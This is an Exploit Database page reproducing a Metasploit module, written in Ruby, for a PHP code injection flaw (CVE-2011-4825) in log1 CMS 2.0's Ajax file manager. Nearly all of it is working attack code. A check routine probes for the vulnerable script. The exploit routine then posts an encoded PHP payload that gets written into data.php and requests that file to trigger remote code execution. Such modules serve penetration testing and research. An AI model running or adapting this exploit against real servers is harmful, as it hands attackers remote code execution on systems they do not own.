Log1 CMS – ‘writeInfo()’ PHP Code Injection (Metasploit)

• Exploit Database
• 9 阅读

• 作者： Metasploit
  日期： 2012-06-03
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/18975/

• ##
  # This file is part of the Metasploit Framework and may be subject to
  # redistribution and commercial restrictions. Please see the Metasploit
  # Framework web site for more information on licensing and terms of use.
  # http://metasploit.com/framework/
  ##
  
  require 'msf/core'
  
  class Metasploit3 < Msf::Exploit::Remote
  	Rank = ExcellentRanking
  
  	include Msf::Exploit::Remote::HttpClient
  
  	def initialize(info={})
  		super(update_info(info,
  			'Name' => "Log1 CMS writeInfo() PHP Code Injection",
  			'Description'=> %q{
  					This module exploits the "Ajax File and Image Manager" component that can be
  				found in log1 CMS.In function.base.php of this component, the 'data' parameter
  				in writeInfo() allows any malicious user to have direct control of writing data
  				to file data.php, which results in arbitrary remote code execution.
  			},
  			'License'=> MSF_LICENSE,
  			'Author' =>
  				[
  					'EgiX', #Found the bug in ajax_create_folder.php
  					'Adel SBM', #Found log1 CMS using the vulnerable ajax_create_folder.php
  					'sinn3r'#Metasploit
  				],
  			'References' =>
  				[
  					['CVE', '2011-4825'],
  					['OSVDB', '76928'],
  					['EDB', '18075'],#Egix's advisory
  					['EDB', '18151'] #Adel's
  				],
  			'Payload'=>
  				{
  					'BadChars' => "\x00"
  				},
  			'DefaultOptions'=>
  				{
  					'ExitFunction' => "none"
  				},
  			'Platform' => 'php',
  			'Arch' => ARCH_PHP,
  			'Targets'=>
  				[
  					['log1 CMS 2.0', {}],
  				],
  			'Privileged' => false,
  			'DisclosureDate' => "Apr 11 2011",
  			'DefaultTarget'=> 0))
  
  		register_options(
  			[
  				OptString.new('TARGETURI', [true, 'The base path to log1 CMS', '/log1cms2.0/'])
  			], self.class)
  	end
  
  
  	def check
  		uri = target_uri.path
  		uri << '/' if uri[-1, 1] != '/'
  
  		res = send_request_raw({
  			'method' => 'GET',
  			'uri'=> "#{uri}admin/libraries/ajaxfilemanager/ajax_create_folder.php"
  		})
  
  		if res and res.code == 200
  			return Exploit::CheckCode::Detected
  		else
  			return Exploit::CheckCode::Safe
  		end
  	end
  
  
  	def exploit
  		uri = target_uri.path
  		uri << '/' if uri[-1, 1] != '/'
  
  		peer = "#{rhost}:#{rport}"
  		php = %Q|#{rand_text_alpha(10)}=<?php #{payload.encoded} ?>|
  
  		print_status("#{peer} - Sending PHP payload (#{php.length.to_s} bytes)")
  		send_request_cgi({
  			'method' => 'POST',
  			'uri'=> "#{uri}admin/libraries/ajaxfilemanager/ajax_create_folder.php",
  			'data' => php
  		})
  
  		print_status("#{peer} - Requesting data.php")
  		send_request_raw({
  			'method' => 'GET',
  			'uri'=> "#{uri}admin/libraries/ajaxfilemanager/inc/data.php"
  		})
  
  		handler
  	end
  end